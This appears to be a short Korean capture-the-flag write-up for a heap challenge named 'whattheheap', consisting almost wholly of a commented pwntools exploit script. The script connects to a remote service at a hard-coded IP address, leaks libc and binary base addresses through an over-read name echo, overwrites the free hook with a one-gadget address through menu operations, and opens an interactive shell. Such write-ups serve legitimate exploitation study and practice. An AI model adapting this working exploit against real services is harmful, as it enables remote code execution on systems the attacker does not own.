y0u_bat
[H3XOR] whattheheap
심심해서 풀어봤습니당.
Exploit
from pwn import *
# Connection setup for the script below.
# Debug-level logging makes pwntools print every byte sent and received,
# which is what lets a reader follow the exchange step by step.
context.update(log_level='debug')
# Local run against the challenge binary, left disabled by the author:
# s = process("./whattheheap")
# Remote CTF service the write-up was run against. Every later statement
# in the file talks to this tube through the module-level name `s`.
s = remote("49.236.136.140", 16000)
def leak():
    """Recover two runtime base addresses from the service's name echo.

    The name field is filled twice with a fixed-length pad (0x28 bytes of
    "a", then 0xd8 bytes of "b"). After each fill the script sends menu
    option "6", waits for the pad to come back, and reads the next six
    bytes as the low bytes of a little-endian 64-bit pointer.

    Returns:
        A (libc_base, func_base) tuple: each leaked pointer minus a
        hard-coded offset. The offsets only hold for the exact binaries
        the author worked against; the page does not identify them.
    """
    # NOTE(review): data other than the pad comes back in the echo, which
    # suggests the name is printed as a string without being terminated
    # or length-bounded. Inferred from this script only; the binary is
    # not shown. Terminating and bounding the name before printing it is
    # the service-side fix for this kind of disclosure.
    # NOTE: the str + recv() concatenations are Python 2 era pwntools
    # usage; under Python 3 recv() returns bytes.
    first_pad = "a" * 0x28
    s.recvuntil("please input your name!\n")
    s.send(first_pad)
    s.sendline("6")
    s.recvuntil(first_pad)
    # Six bytes arrive; two zero bytes widen them to the 8 that u64 needs.
    raw_libc_ptr = s.recv(6) + "\x00\x00"
    libc_base = u64(raw_libc_ptr) - 0x18c627

    # Same pattern through the rename prompt, with a longer pad.
    second_pad = "b" * 0xd8
    s.sendline("5")
    s.recvuntil("Enter the name you want to change.\n")
    s.send(second_pad)
    s.sendline("6")
    s.recvuntil(second_pad)
    raw_func_ptr = s.recv(6) + "\x00\x00"
    # "func_base" is the author's label; what it is the base of is not
    # stated on the page.
    func_base = u64(raw_func_ptr) - 0x108d
    return libc_base, func_base
# Main sequence. The order of the sends and receives below is the whole
# protocol with the service, so it is documented in place, not reshaped.
# Both bases come from the disclosure in leak(); only libc_base is used
# for addressing below, func_base is just logged.
libc_base,func_base = leak()
# Address the author labels free_hook: libc base plus a fixed offset.
# The offset is tied to one specific libc build, which the page does not
# identify. For defenders: glibc 2.34 removed the malloc/free hook
# variables, so this class of hook overwrite targets older libc versions.
free_hook = libc_base + 0x3C67A8
# Menu option "5" (rename prompt): the new "name" is the packed 8-byte
# free_hook address instead of text.
s.sendline("5")
s.recvuntil("Enter the name you want to change.\n")
s.send(p64(free_hook))
# Menu options "3" then "1", followed by a second packed address
# (libc base plus another build-specific offset).
# NOTE(review): the page does not explain these menu entries; presumably
# the value is written through the pointer stored by the rename above.
# Confirm against the binary.
s.recvuntil(">")
s.sendline("3")
s.recvuntil(">")
s.sendline("1")
s.send(p64(libc_base+0x4526a))
# Menu options "2" then "0".
# NOTE(review): presumably this reaches a free() call in the service,
# which is where an overwritten hook would be invoked. Not shown on the
# page; confirm against the binary.
s.recvuntil(">")
s.sendline("2")
s.recvuntil(">")
s.sendline("0")
# Record the computed bases so a run can be checked against expectations.
log.info("libc_base : " + hex(libc_base))
log.info("func_base : " + hex(func_base))
# Hand the connection over to the terminal.
s.interactive()